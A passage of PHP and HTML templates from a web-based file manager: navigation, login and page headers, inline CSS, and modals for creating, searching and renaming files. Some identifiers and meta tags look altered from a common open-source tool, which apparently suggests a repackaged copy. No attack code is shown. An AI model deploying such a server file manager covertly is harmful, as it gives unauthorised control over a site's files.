                        <a title="<?php echo lng('NewItem') ?>" class="nav-link" href="#createNewItem" data-bs-toggle="modal" data-bs-target="#createNewItem"><i class="fa fa-plus-square"></i> <?php echo lng('NewItem') ?></a>
                    </li>
                    <?php endif; ?>
                    <?php if (FM_USE_AUTH): ?>
                    <li class="nav-item avatar dropdown">
                        <a class="nav-link dropdown-toggle" id="navbarDropdownMenuLink-5" data-bs-toggle="dropdown" aria-haspopup="true" aria-expanded="false"> <i class="fa fa-user-circle"></i> <?php if(isset($_SESSION[DN_CESSION_ID]['logged'])) { echo $_SESSION[DN_CESSION_ID]['logged']; } ?></a>
                        <div class="dropdown-menu text-small shadow <?php echo fm_get_theme(); ?>" aria-labelledby="navbarDropdownMenuLink-5">
                            <?php if (!FM_READONLY): ?>
                            <a title="<?php echo lng('Settings') ?>" class="dropdown-item nav-link" href="?p=<?php echo urlencode(FM_PATH) ?>&amp;settings=1"><i class="fa fa-cog" aria-hidden="true"></i> <?php echo lng('Settings') ?></a>
                            <?php endif ?>
                            <a title="<?php echo lng('Help') ?>" class="dropdown-item nav-link" href="?p=<?php echo urlencode(FM_PATH) ?>&amp;help=2"><i class="fa fa-exclamation-circle" aria-hidden="true"></i> <?php echo lng('Help') ?></a>
                            <a title="<?php echo lng('Logout') ?>" class="dropdown-item nav-link" href="?logout=1"><i class="fa fa-sign-out" aria-hidden="true"></i> <?php echo lng('Logout') ?></a>
                        </div>
                    </li>
                    <?php else: ?>
                        <?php if (!FM_READONLY): ?>
                            <li class="nav-item">
                                <a title="<?php echo lng('Settings') ?>" class="dropdown-item nav-link" href="?p=<?php echo urlencode(FM_PATH) ?>&amp;settings=1"><i class="fa fa-cog" aria-hidden="true"></i> <?php echo lng('Settings') ?></a>
                            </li>
                        <?php endif; ?>
                    <?php endif; ?>
                </ul>
            </div>
        </div>
    </nav>
    <?php
}


function fm_show_message()
{
    if (isset($_SESSION[DN_CESSION_ID]['message'])) {
        $class = isset($_SESSION[DN_CESSION_ID]['status']) ? $_SESSION[DN_CESSION_ID]['status'] : 'ok';
        echo '<p class="message ' . $class . '">' . $_SESSION[DN_CESSION_ID]['message'] . '</p>';
        unset($_SESSION[DN_CESSION_ID]['message']);
        unset($_SESSION[DN_CESSION_ID]['status']);
    }
}


function fm_show_header_login()
{
$sprites_ver = '20160315';
header("Content-Type: text/html; charset=utf-8");
header("Expires: Sat, 26 Jul 1997 05:00:00 GMT");
header("Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0");
header("Pragma: no-cache");

global $lang, $root_url, $favicon_path;
?>
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
    <meta name="description" content="peripherad">
    <meta name="author" content="CCP Programmers">
    <meta name="robots" content="noindex, nofollow">
    <meta name="googlebot" content="noindex">
    <?php if($favicon_path) { echo '<link rel="icon" href="'.fanco($favicon_path).'" type="image/png">'; } ?>
    <title><?php echo fanco(APP_TITLE) ?></title>
    <?php print_external('pre-jsdelivr'); ?>
    <?php print_external('css-bootstrap'); ?>
    <style>
        body.fm-login-page{ background-color:#f7f9fb;font-size:14px;background-color:#f7f9fb;background-image:url("data:image/svg+xml,%3Csvg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 304 304' width='304' height='304'%3E%3Cpath fill='%23e2e9f1' fill-opacity='0.4' d='M44.1 224a5 5 0 1 1 0 2H0v-2h44.1zm160 48a5 5 0 1 1 0 2H82v-2h122.1zm57.8-46a5 5 0 1 1 0-2H304v2h-42.1zm0 16a5 5 0 1 1 0-2H304v2h-42.1zm6.2-114a5 5 0 1 1 0 2h-86.2a5 5 0 1 1 0-2h86.2zm-256-48a5 5 0 1 1 0 2H0v-2h12.1zm185.8 34a5 5 0 1 1 0-2h86.2a5 5 0 1 1 0 2h-86.2zM258 12.1a5 5 0 1 1-2 0V0h2v12.1zm-64 208a5 5 0 1 1-2 0v-54.2a5 5 0 1 1 2 0v54.2zm48-198.2V80h62v2h-64V21.9a5 5 0 1 1 2 0zm16 16V64h46v2h-48V37.9a5 5 0 1 1 2 0zm-128 96V208h16v12.1a5 5 0 1 1-2 0V210h-16v-76.1a5 5 0 1 1 2 0zm-5.9-21.9a5 5 0 1 1 0 2H114v48H85.9a5 5 0 1 1 0-2H112v-48h12.1zm-6.2 130a5 5 0 1 1 0-2H176v-74.1a5 5 0 1 1 2 0V242h-60.1zm-16-64a5 5 0 1 1 0-2H114v48h10.1a5 5 0 1 1 0 2H112v-48h-10.1zM66 284.1a5 5 0 1 1-2 0V274H50v30h-2v-32h18v12.1zM236.1 176a5 5 0 1 1 0 2H226v94h48v32h-2v-30h-48v-98h12.1zm25.8-30a5 5 0 1 1 0-2H274v44.1a5 5 0 1 1-2 0V146h-10.1zm-64 96a5 5 0 1 1 0-2H208v-80h16v-14h-42.1a5 5 0 1 1 0-2H226v18h-16v80h-12.1zm86.2-210a5 5 0 1 1 0 2H272V0h2v32h10.1zM98 101.9V146H53.9a5 5 0 1 1 0-2H96v-42.1a5 5 0 1 1 2 0zM53.9 34a5 5 0 1 1 0-2H80V0h2v34H53.9zm60.1 3.9V66H82v64H69.9a5 5 0 1 1 0-2H80V64h32V37.9a5 5 0 1 1 2 0zM101.9 82a5 5 0 1 1 0-2H128V37.9a5 5 0 1 1 2 0V82h-28.1zm16-64a5 5 0 1 1 0-2H146v44.1a5 5 0 1 1-2 0V18h-26.1zm102.2 270a5 5 0 1 1 0 2H98v14h-2v-16h124.1zM242 149.9V160h16v34h-16v62h48v48h-2v-46h-48v-66h16v-30h-16v-12.1a5 5 0 1 1 2 0zM53.9 18a5 5 0 1 1 0-2H64V2H48V0h18v18H53.9zm112 32a5 5 0 1 1 0-2H192V0h50v2h-48v48h-28.1zm-48-48a5 5 0 0 1-9.8-2h2.07a3 3 0 1 0 5.66 0H178v34h-18V21.9a5 5 0 1 1 2 0V32h14V2h-58.1zm0 96a5 5 0 1 1 0-2H137l32-32h39V21.9a5 5 0 1 1 2 0V66h-40.17l-32 32H117.9zm28.1 90.1a5 5 0 1 1-2 0v-76.51L175.59 80H224V21.9a5 5 0 1 1 2 0V82h-49.59L146 112.41v75.69zm16 32a5 5 0 1 1-2 0v-99.51L184.59 96H300.1a5 5 0 0 1 3.9-3.9v2.07a3 3 0 0 0 0 5.66v2.07a5 5 0 0 1-3.9-3.9H185.41L162 121.41v98.69zm-144-64a5 5 0 1 1-2 0v-3.51l48-48V48h32V0h2v50H66v55.41l-48 48v2.69zM50 53.9v43.51l-48 48V208h26.1a5 5 0 1 1 0 2H0v-65.41l48-48V53.9a5 5 0 1 1 2 0zm-16 16V89.41l-34 34v-2.82l32-32V69.9a5 5 0 1 1 2 0zM12.1 32a5 5 0 1 1 0 2H9.41L0 43.41V40.6L8.59 32h3.51zm265.8 18a5 5 0 1 1 0-2h18.69l7.41-7.41v2.82L297.41 50H277.9zm-16 160a5 5 0 1 1 0-2H288v-71.41l16-16v2.82l-14 14V210h-28.1zm-208 32a5 5 0 1 1 0-2H64v-22.59L40.59 194H21.9a5 5 0 1 1 0-2H41.41L66 216.59V242H53.9zm150.2 14a5 5 0 1 1 0 2H96v-56.6L56.6 162H37.9a5 5 0 1 1 0-2h19.5L98 200.6V256h106.1zm-150.2 2a5 5 0 1 1 0-2H80v-46.59L48.59 178H21.9a5 5 0 1 1 0-2H49.41L82 208.59V258H53.9zM34 39.8v1.61L9.41 66H0v-2h8.59L32 40.59V0h2v39.8zM2 300.1a5 5 0 0 1 3.9 3.9H3.83A3 3 0 0 0 0 302.17V256h18v48h-2v-46H2v42.1zM34 241v63h-2v-62H0v-2h34v1zM17 18H0v-2h16V0h2v18h-1zm273-2h14v2h-16V0h2v16zm-32 273v15h-2v-14h-14v14h-2v-16h18v1zM0 92.1A5.02 5.02 0 0 1 6 97a5 5 0 0 1-6 4.9v-2.07a3 3 0 1 0 0-5.66V92.1zM80 272h2v32h-2v-32zm37.9 32h-2.07a3 3 0 0 0-5.66 0h-2.07a5 5 0 0 1 9.8 0zM5.9 0A5.02 5.02 0 0 1 0 5.9V3.83A3 3 0 0 0 3.83 0H5.9zm294.2 0h2.07A3 3 0 0 0 304 3.83V5.9a5 5 0 0 1-3.9-5.9zm3.9 300.1v2.07a3 3 0 0 0-1.83 1.83h-2.07a5 5 0 0 1 3.9-3.9zM97 100a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm0-16a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm16 16a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm16 16a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm0 16a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm-48 32a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm16 16a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm32 48a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm-16 16a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm32-16a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm0-32a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm16 32a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm32 16a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm0-16a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm-16-64a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm16 0a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm16 96a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm0 16a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm16 16a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm16-144a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm0 32a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm16-32a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm16-16a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm-96 0a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm0 16a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm16-32a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm96 0a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm-16-64a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm16-16a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm-32 0a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm0-16a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm-16 0a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm-16 0a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm-16 0a3 3 0 1 0 0-6 3 3 0 0 0 0 6zM49 36a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm-32 0a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm32 16a3 3 0 1 0 0-6 3 3 0 0 0 0 6zM33 68a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm16-48a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm0 240a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm16 32a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm-16-64a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm0 16a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm-16-32a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm80-176a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm16 0a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm-16-16a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm32 48a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm16-16a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm0-32a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm112 176a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm-16 16a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm0 16a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm0 16a3 3 0 1 0 0-6 3 3 0 0 0 0 6zM17 180a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm0 16a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm0-32a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm16 0a3 3 0 1 0 0-6 3 3 0 0 0 0 6zM17 84a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm32 64a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm16-16a3 3 0 1 0 0-6 3 3 0 0 0 0 6z'%3E%3C/path%3E%3C/svg%3E");}
        .fm-login-page .brand{ width:121px;overflow:hidden;margin:0 auto;position:relative;z-index:1}
        .fm-login-page .brand img{ width:100%}
        .fm-login-page .card-wrapper{ width:360px;margin-top:10%;margin-left:auto;margin-right:auto;}
        .fm-login-page .card{ border-color:transparent;box-shadow:0 4px 8px rgba(0,0,0,.05)}
        .fm-login-page .card-title{ margin-bottom:1.5rem;font-size:24px;font-weight:400;}
        .fm-login-page .form-control{ border-width:2.3px}
        .fm-login-page .form-group label{ width:100%}
        .fm-login-page .btn.btn-block{ padding:12px 10px}
        .fm-login-page .footer{ margin:40px 0;color:#888;text-align:center}
        @media screen and (max-width:425px){
            .fm-login-page .card-wrapper{ width:90%;margin:0 auto;margin-top:10%;}
        }
        @media screen and (max-width:320px){
            .fm-login-page .card.fat{ padding:0}
            .fm-login-page .card.fat .card-body{ padding:15px}
        }
        .message{ padding:4px 7px;border:1px solid #ddd;background-color:#fff}
        .message.ok{ border-color:green;color:green}
        .message.error{ border-color:red;color:red}
        .message.alert{ border-color:orange;color:orange}
        body.fm-login-page.theme-dark {background-color: #2f2a2a;}
        .theme-dark svg g, .theme-dark svg path {fill: #ffffff; }
    </style>
</head>
<body class="fm-login-page <?php echo (FM_THEME == "dark") ? 'theme-dark' : ''; ?>">
<div id="wrapper" class="container-fluid">

    <?php
    }

    function fm_show_footer_login()
    {
    ?>
</div>
<?php print_external('js-jquery'); ?>
<?php print_external('js-bootstrap'); ?>
</body>
</html>
<?php
}


function fm_show_header()
{
$sprites_ver = '20160315';
header("Content-Type: text/html; charset=utf-8");
header("Expires: Sat, 26 Jul 1997 05:00:00 GMT");
header("Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0");
header("Pragma: no-cache");

global $lang, $root_url, $sticky_navbar, $favicon_path;
$isStickyNavBar = $sticky_navbar ? 'navbar-fixed' : 'navbar-normal';
?>
<!DOCTYPE html>
<html>
<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
    <meta name="description" content="peripherad">
    <meta name="author" content="CCP Programmers">
    <meta name="robots" content="noindex, nofollow">
    <meta name="googlebot" content="noindex">
    <?php if($favicon_path) { echo '<link rel="icon" href="'.fanco($favicon_path).'" type="image/png">'; } ?>
    <title><?php echo fanco(APP_TITLE) ?></title>
    <?php print_external('pre-jsdelivr'); ?>
    <?php print_external('pre-cloudflare'); ?>
    <?php print_external('css-bootstrap'); ?>
    <?php print_external('css-font-awesome'); ?>
    <?php if (FM_USE_HIGHLIGHTJS and isset($_GET['view'])): ?>
    <?php print_external('css-highlightjs'); ?>
    <?php endif; ?>
    <script type="text/javascript">window.csrf = '<?php echo $_SESSION['token']; ?>';</script>
    <style>
        html { -moz-osx-font-smoothing: grayscale; -webkit-font-smoothing: antialiased; text-rendering: optimizeLegibility; height: 100%; scroll-behavior: smooth;}
        *,*::before,*::after { box-sizing: border-box;}
        body { font-size:15px; color:#222;background:#F7F7F7; }
        body.navbar-fixed { margin-top:55px; }
        a, a:hover, a:visited, a:focus { text-decoration:none !important; }
        .filename, td, th { white-space:nowrap  }
        .navbar-brand { font-weight:bold; }
        .nav-item.avatar a { cursor:pointer;text-transform:capitalize; }
        .nav-item.avatar a > i { font-size:15px; }
        .nav-item.avatar .dropdown-menu a { font-size:13px; }
        #search-addon { font-size:12px;border-right-width:0; }
        .brl-0 { background:transparent;border-left:0; border-top-left-radius: 0; border-bottom-left-radius: 0; }
        .brr-0 { border-top-right-radius: 0; border-bottom-right-radius: 0; }
        .bread-crumb { color:#cccccc;font-style:normal; }
        #main-table { transition: transform .25s cubic-bezier(0.4, 0.5, 0, 1),width 0s .25s;}
        #main-table .filename a { color:#222222; }
        .table td, .table th { vertical-align:middle !important; }
        .table .custom-checkbox-td .custom-control.custom-checkbox, .table .custom-checkbox-header .custom-control.custom-checkbox { min-width:18px; display: flex;align-items: center; justify-content: center; }
        .table-sm td, .table-sm th { padding:.4rem; }
        .table-bordered td, .table-bordered th { border:1px solid #f1f1f1; }
        .hidden { display:none  }
        pre.with-hljs { padding:0; overflow: hidden;  }
        pre.with-hljs code { margin:0;border:0;overflow:scroll;  }
        code.maxheight, pre.maxheight { max-height:512px  }
        .fa.fa-caret-right { font-size:1.2em;margin:0 4px;vertical-align:middle;color:#ececec  }
        .fa.fa-home { font-size:1.3em;vertical-align:bottom  }
        .path { margin-bottom:10px  }
        form.dropzone { min-height:200px;border:2px dashed #007bff;line-height:6rem; }
        .right { text-align:right  }
        .center, .close, .login-form, .preview-img-container { text-align:center  }
        .message { padding:4px 7px;border:1px solid #ddd;background-color:#fff  }
        .message.ok { border-color:green;color:green  }
        .message.error { border-color:red;color:red  }
        .message.alert { border-color:orange;color:orange  }
        .preview-img { max-width:100%;max-height:80vh;background:url(data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAIAAACQkWg2AAAAKklEQVR42mL5//8/Azbw+PFjrOJMDCSCUQ3EABZc4S0rKzsaSvTTABBgAMyfCMsY4B9iAAAAAElFTkSuQmCC);cursor:zoom-in }
        input#preview-img-zoomCheck[type=checkbox] { display:none }
        input#preview-img-zoomCheck[type=checkbox]:checked ~ label > img { max-width:none;max-height:none;cursor:zoom-out }
        .inline-actions > a > i { font-size:1em;margin-left:5px;background:#3785c1;color:#fff;padding:3px 4px;border-radius:3px; }
        .preview-video { position:relative;max-width:100%;height:0;padding-bottom:62.5%;margin-bottom:10px  }
        .preview-video video { position:absolute;width:100%;height:100%;left:0;top:0;background:#000  }
        .compact-table { border:0;width:auto  }
        .compact-table td, .compact-table th { width:100px;border:0;text-align:center  }
        .compact-table tr:hover td { background-color:#fff  }
        .filename { max-width:420px;overflow:hidden;text-overflow:ellipsis  }
        .break-word { word-wrap:break-word;margin-left:30px  }
        .break-word.float-left a { color:#7d7d7d  }
        .break-word + .float-right { padding-right:30px;position:relative  }
        .break-word + .float-right > a { color:#7d7d7d;font-size:1.2em;margin-right:4px  }
        #editor { position:absolute;right:15px;top:100px;bottom:15px;left:15px  }
        @media (max-width:481px) {
            #editor { top:150px; }
        }
        #normal-editor { border-radius:3px;border-width:2px;padding:10px;outline:none; }
        .btn-2 { padding:4px 10px;font-size:small; }
        li.file:before,li.folder:before { font:normal normal normal 14px/1 FontAwesome;content:"\f016";margin-right:5px }
        li.folder:before { content:"\f114" }
        i.fa.fa-folder-o { color:#0157b3 }
        i.fa.fa-picture-o { color:#26b99a }
        i.fa.fa-file-archive-o { color:#da7d7d }
        .btn-2 i.fa.fa-file-archive-o { color:inherit }
        i.fa.fa-css3 { color:#f36fa0 }
        i.fa.fa-file-code-o { color:#007bff }
        i.fa.fa-code { color:#cc4b4c }
        i.fa.fa-file-text-o { color:#0096e6 }
        i.fa.fa-html5 { color:#d75e72 }
        i.fa.fa-file-excel-o { color:#09c55d }
        i.fa.fa-file-powerpoint-o { color:#f6712e }
        i.go-back { font-size:1.2em;color:#007bff; }
        .main-nav { padding:0.2rem 1rem;box-shadow:0 4px 5px 0 rgba(0, 0, 0, .14), 0 1px 10px 0 rgba(0, 0, 0, .12), 0 2px 4px -1px rgba(0, 0, 0, .2)  }
        .dataTables_filter { display:none; }
        table.dataTable thead .sorting { cursor:pointer;background-repeat:no-repeat;background-position:center right;background-image:url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABMAAAATCAQAAADYWf5HAAAAkElEQVQoz7XQMQ5AQBCF4dWQSJxC5wwax1Cq1e7BAdxD5SL+Tq/QCM1oNiJidwox0355mXnG/DrEtIQ6azioNZQxI0ykPhTQIwhCR+BmBYtlK7kLJYwWCcJA9M4qdrZrd8pPjZWPtOqdRQy320YSV17OatFC4euts6z39GYMKRPCTKY9UnPQ6P+GtMRfGtPnBCiqhAeJPmkqAAAAAElFTkSuQmCC'); }
        table.dataTable thead .sorting_asc { cursor:pointer;background-repeat:no-repeat;background-position:center right;background-image:url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABMAAAATCAYAAAByUDbMAAAAZ0lEQVQ4y2NgGLKgquEuFxBPAGI2ahhWCsS/gDibUoO0gPgxEP8H4ttArEyuQYxAPBdqEAxPBImTY5gjEL9DM+wTENuQahAvEO9DMwiGdwAxOymGJQLxTyD+jgWDxCMZRsEoGAVoAADeemwtPcZI2wAAAABJRU5ErkJggg=='); }
        table.dataTable thead .sorting_desc { cursor:pointer;background-repeat:no-repeat;background-position:center right;background-image:url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABMAAAATCAYAAAByUDbMAAAAZUlEQVQ4y2NgGAWjYBSggaqGu5FA/BOIv2PBIPFEUgxjB+IdQPwfC94HxLykus4GiD+hGfQOiB3J8SojEE9EM2wuSJzcsFMG4ttQgx4DsRalkZENxL+AuJQaMcsGxBOAmGvopk8AVz1sLZgg0bsAAAAASUVORK5CYII='); }
        table.dataTable thead tr:first-child th.custom-checkbox-header:first-child { background-image:none; }
        .footer-action li { margin-bottom:10px; }
        .app-v-title { font-size:24px;font-weight:300;letter-spacing:-.5px;text-transform:uppercase; }
        hr.custom-hr { border-top:1px dashed #8c8b8b;border-bottom:1px dashed #fff; }
        #snackbar { visibility:hidden;min-width:250px;margin-left:-125px;background-color:#333;color:#fff;text-align:center;border-radius:2px;padding:16px;position:fixed;z-index:1;left:50%;bottom:30px;font-size:17px; }
        #snackbar.show { visibility:visible;-webkit-animation:fadein 0.5s, fadeout 0.5s 2.5s;animation:fadein 0.5s, fadeout 0.5s 2.5s; }
        @-webkit-keyframes fadein { from { bottom:0;opacity:0; }
        to { bottom:30px;opacity:1; }
        }
        @keyframes fadein { from { bottom:0;opacity:0; }
        to { bottom:30px;opacity:1; }
        }
        @-webkit-keyframes fadeout { from { bottom:30px;opacity:1; }
        to { bottom:0;opacity:0; }
        }
        @keyframes fadeout { from { bottom:30px;opacity:1; }
        to { bottom:0;opacity:0; }
        }
        #main-table span.badge { border-bottom:2px solid #f8f9fa }
        #main-table span.badge:nth-child(1) { border-color:#df4227 }
        #main-table span.badge:nth-child(2) { border-color:#f8b600 }
        #main-table span.badge:nth-child(3) { border-color:#00bd60 }
        #main-table span.badge:nth-child(4) { border-color:#4581ff }
        #main-table span.badge:nth-child(5) { border-color:#ac68fc }
        #main-table span.badge:nth-child(6) { border-color:#45c3d2 }
        @media only screen and (min-device-width:768px) and (max-device-width:1024px) and (orientation:landscape) and (-webkit-min-device-pixel-ratio:2) { .navbar-collapse .col-xs-6 { padding:0; }
        }
        .btn.active.focus,.btn.active:focus,.btn.focus,.btn.focus:active,.btn:active:focus,.btn:focus { outline:0!important;outline-offset:0!important;background-image:none!important;-webkit-box-shadow:none!important;box-shadow:none!important }
        .lds-facebook { display:none;position:relative;width:64px;height:64px }
        .lds-facebook div,.lds-facebook.show-me { display:inline-block }
        .lds-facebook div { position:absolute;left:6px;width:13px;background:#007bff;animation:lds-facebook 1.2s cubic-bezier(0,.5,.5,1) infinite }
        .lds-facebook div:nth-child(1) { left:6px;animation-delay:-.24s }
        .lds-facebook div:nth-child(2) { left:26px;animation-delay:-.12s }
        .lds-facebook div:nth-child(3) { left:45px;animation-delay:0s }
        @keyframes lds-facebook { 0% { top:6px;height:51px }
        100%,50% { top:19px;height:26px }
        }
        ul#search-wrapper { padding-left: 0;border: 1px solid #ecececcc; } ul#search-wrapper li { list-style: none; padding: 5px;border-bottom: 1px solid #ecececcc; }
        ul#search-wrapper li:nth-child(odd){ background: #f9f9f9cc;}
        .c-preview-img { max-width: 300px; }
        .border-radius-0 { border-radius: 0; }
        .float-right { float: right; }
        .table-hover>tbody>tr:hover>td:first-child { border-left: 1px solid #1b77fd; }
        #main-table tr.even { background-color: #F8F9Fa; }
        .filename>a>i {margin-right: 3px;}
    </style>
    <?php
    if (FM_THEME == "dark"): ?>
        <style>
            :root {
                --bs-bg-opacity: 1;
                --bg-color: #f3daa6;
                --bs-dark-rgb: 28, 36, 41 !important;
                --bs-bg-opacity: 1;
            }
            .table-dark { --bs-table-bg: 28, 36, 41 !important; }
            .btn-primary { --bs-btn-bg: #26566c; --bs-btn-border-color: #26566c; }
            body.theme-dark { background-image: linear-gradient(90deg, #1c2429, #263238); color: #CFD8DC; }
            .list-group .list-group-item { background: #343a40; }
            .theme-dark .navbar-nav i, .navbar-nav .dropdown-toggle, .break-word { color: #CFD8DC; }
            a, a:hover, a:visited, a:active, #main-table .filename a, i.fa.fa-folder-o, i.go-back { color: var(--bg-color); }
            ul#search-wrapper li:nth-child(odd) { background: #212a2f; }
            .theme-dark .btn-outline-primary { color: #b8e59c; border-color: #b8e59c; }
            .theme-dark .btn-outline-primary:hover, .theme-dark .btn-outline-primary:active { background-color: #2d4121;}
            .theme-dark input.form-control { background-color: #101518; color: #CFD8DC; }
            .theme-dark .dropzone { background: transparent; }
            .theme-dark .inline-actions > a > i { background: #79755e; }
            .theme-dark .text-white { color: #CFD8DC !important; }
            .theme-dark .table-bordered td, .table-bordered th { border-color: #343434; }
            .theme-dark .table-bordered td .custom-control-input, .theme-dark .table-bordered th .custom-control-input { opacity: 0.678; }
            .message { background-color: #212529; }
            .compact-table tr:hover td { background-color: #3d3d3d; }
            #main-table tr.even { background-color: #21292f; }
            form.dropzone { border-color: #79755e; }
        </style>
    <?php endif; ?>
</head>
<body class="<?php echo (FM_THEME == "dark") ? 'theme-dark' : ''; ?> <?php echo $isStickyNavBar; ?>">
<div id="wrapper" class="container-fluid">
    <!-- New Item creation -->
    <div class="modal fade" id="createNewItem" tabindex="-1" role="dialog" data-bs-backdrop="static" data-bs-keyboard="false" aria-labelledby="newItemModalLabel" aria-hidden="true">
        <div class="modal-dialog" role="document">
            <form class="modal-content <?php echo fm_get_theme(); ?>" method="post">
                <div class="modal-header">
                    <h5 class="modal-title" id="newItemModalLabel"><i class="fa fa-plus-square fa-fw"></i><?php echo lng('CreateNewItem') ?></h5>
                    <button type="button" class="btn-close" data-bs-dismiss="modal" aria-label="Close"></button>
                </div>
                <div class="modal-body">
                    <p><label for="newfile"><?php echo lng('ItemType') ?> </label></p>
                    <div class="form-check form-check-inline">
                      <input class="form-check-input" type="radio" name="newfile" id="customRadioInline1" name="newfile" value="file">
                      <label class="form-check-label" for="customRadioInline1"><?php echo lng('File') ?></label>
                    </div>
                    <div class="form-check form-check-inline">
                      <input class="form-check-input" type="radio" name="newfile" id="customRadioInline2" value="folder" checked>
                      <label class="form-check-label" for="customRadioInline2"><?php echo lng('Folder') ?></label>
                    </div>

                    <p class="mt-3"><label for="newfilename"><?php echo lng('ItemName') ?> </label></p>
                    <input type="text" name="newfilename" id="newfilename" value="" class="form-control" placeholder="<?php echo lng('Enter here...') ?>" required>
                </div>
                <div class="modal-footer">
                    <input type="hidden" name="token" value="<?php echo $_SESSION['token']; ?>">
                    <button type="button" class="btn btn-outline-primary" data-bs-dismiss="modal"><i class="fa fa-times-circle"></i> <?php echo lng('Cancel') ?></button>
                    <button type="submit" class="btn btn-success"><i class="fa fa-check-circle"></i> <?php echo lng('CreateNow') ?></button>
                </div>
            </form>
        </div>
    </div>

    <!-- Advance Search Modal -->
    <div class="modal fade" id="searchModal" tabindex="-1" role="dialog" aria-labelledby="searchModalLabel" aria-hidden="true">
      <div class="modal-dialog modal-lg" role="document">
        <div class="modal-content <?php echo fm_get_theme(); ?>">
          <div class="modal-header">
            <h5 class="modal-title col-10" id="searchModalLabel">
                <div class="input-group mb-3">
                  <input type="text" class="form-control" placeholder="<?php echo lng('Search') ?> <?php echo lng('a files') ?>" aria-label="<?php echo lng('Search') ?>" aria-describedby="search-addon3" id="advanced-search" autofocus required>
                  <span class="input-group-text" id="search-addon3"><i class="fa fa-search"></i></span>
                </div>
            </h5>
            <button type="button" class="btn-close" data-bs-dismiss="modal" aria-label="Close"></button>
          </div>
          <div class="modal-body">
            <form action="" method="post">
                <div class="lds-facebook"><div></div><div></div><div></div></div>
                <ul id="search-wrapper">
                    <p class="m-2"><?php echo lng('Search file in folder and subfolders...') ?></p>
                </ul>
            </form>
          </div>
        </div>
      </div>
    </div>

    <!--Rename Modal -->
    <div class="modal modal-alert" data-bs-backdrop="static" data-bs-keyboard="false" tabindex="-1" role="dialog" id="renameDailog">
      <div class="modal-dialog" role="document">
        <form class="modal-content rounded-3 shadow <?php echo fm_get_theme(); ?>" method="post" autocomplete="off">
          <div class="modal-body p-4 text-center">
            <h5 class="mb-3"><?php echo lng('Are you sure want to rename?') ?></h5>
            <p class="mb-1">
                <input type="text" name="rename_to" id="js-rename-to" class="form-control" placeholder="<?php echo lng('Enter new file name') ?>" required>
                <input type="hidden" name="token" value="<?php echo $_SESSION['token']; ?>">
                <input type="hidden" name="rename_from" id="js-rename-from">
            </p>
          </div>
          <div class="modal-footer flex-nowrap p-0">
            <button type="button" class="btn btn-lg btn-link fs-6 text-decoration-none col-6 m-0 rounded-0 border-end" data-bs-dismiss="modal"><?php echo lng('Cancel') ?></button>
            <button type="submit" class="btn btn-lg btn-link fs-6 text-decoration-none col-6 m-0 rounded-0"><strong><?php echo lng('Okay') ?></strong></button>
          </div>
        </form>
      </div>
    </div>

    <!-- Confirm Modal -->
    <script type="text/html" id="js-tpl-confirm">
        <div class="modal modal-alert confirmDailog" data-bs-backdrop="static" data-bs-keyboard="false" tabindex="-1" role="dialog" id="confirmDailog-<%this.id%>">
